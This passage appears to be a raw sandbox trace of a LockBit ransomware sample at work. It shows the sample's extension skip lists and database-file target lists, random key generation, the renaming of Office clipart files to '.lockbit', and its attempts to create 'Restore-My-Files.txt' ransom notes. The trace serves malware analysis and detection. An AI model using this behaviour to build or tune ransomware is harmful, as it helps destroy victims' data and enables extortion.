lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.447] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.447] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00466_.WMF") returned -1 [0175.448] lstrcmpiW (lpString1="ntldr", lpString2="SO00466_.WMF") returned -1 [0175.448] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00466_.WMF") returned -1 [0175.448] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00466_.WMF") returned -1 [0175.448] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00466_.WMF") returned -1 [0175.448] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00466_.WMF") returned 1 [0175.448] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00466_.WMF") returned -1 [0175.448] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.448] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF") returned=".WMF" [0175.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.448] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.448] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.449] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.449] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF.lockbit") returned 72 [0175.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00466_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.451] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.451] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.451] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2760) returned 1 [0175.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.452] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.478] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.478] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.478] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.480] free (_Block=0x1fa2ed8) [0175.480] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00466_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.480] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.480] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.480] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78be2200, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78be2200, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xfc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00476_.WMF", cAlternateFileName="")) returned 1 [0175.480] lstrcmpiW (lpString1=".", lpString2="SO00476_.WMF") returned -1 [0175.480] lstrcmpiW (lpString1="..", lpString2="SO00476_.WMF") returned -1 [0175.480] PathFindExtensionW (pszPath="SO00476_.WMF") returned=".WMF" [0175.481] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.481] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.482] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.482] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00476_.WMF") returned -1 [0175.482] lstrcmpiW (lpString1="ntldr", lpString2="SO00476_.WMF") returned -1 [0175.482] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00476_.WMF") returned -1 [0175.482] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00476_.WMF") returned -1 [0175.482] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00476_.WMF") returned -1 [0175.483] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00476_.WMF") returned 1 [0175.483] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00476_.WMF") returned -1 [0175.483] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.483] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF") returned=".WMF" [0175.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.483] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.483] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.484] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.484] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF.lockbit") returned 72 [0175.484] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00476_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.485] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.485] malloc (_Size=0x40068) returned 0x3df0008 [0175.485] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4032) returned 1 [0175.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.487] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.492] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.492] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.492] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.494] free (_Block=0x1fa2ed8) [0175.494] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00476_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.494] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.494] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.494] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3ef600, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c3ef600, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x5b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00479_.WMF", cAlternateFileName="")) returned 1 [0175.494] lstrcmpiW (lpString1=".", lpString2="SO00479_.WMF") returned -1 [0175.494] lstrcmpiW (lpString1="..", lpString2="SO00479_.WMF") returned -1 [0175.494] PathFindExtensionW (pszPath="SO00479_.WMF") returned=".WMF" [0175.494] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.495] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.496] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.496] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00479_.WMF") returned -1 [0175.497] lstrcmpiW (lpString1="ntldr", lpString2="SO00479_.WMF") returned -1 [0175.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00479_.WMF") returned -1 [0175.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00479_.WMF") returned -1 [0175.497] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00479_.WMF") returned -1 [0175.497] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00479_.WMF") returned 1 [0175.497] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00479_.WMF") returned -1 [0175.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.497] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF") returned=".WMF" [0175.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.497] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.497] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.498] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.499] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF.lockbit") returned 72 [0175.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00479_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.500] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.500] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.500] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=23304) returned 1 [0175.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.502] GetProcAddress 